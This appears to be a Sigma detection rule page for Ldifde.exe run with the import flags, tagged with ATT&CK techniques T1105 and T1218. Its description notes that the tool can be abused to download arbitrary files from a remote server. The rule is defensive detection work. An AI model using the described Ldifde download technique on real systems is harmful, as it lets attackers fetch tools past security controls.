Techniques
Sample rules
Import LDAP Data Interchange Format File Via Ldifde.EXE
- source: sigma
- technicques:
- t1105
- t1218
Description
Detects the execution of “Ldifde.exe” with the import flag “-i”. The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- -i
- -f
selection_img:
- Image|endswith: \ldifde.exe
- OriginalFileName: ldifde.exe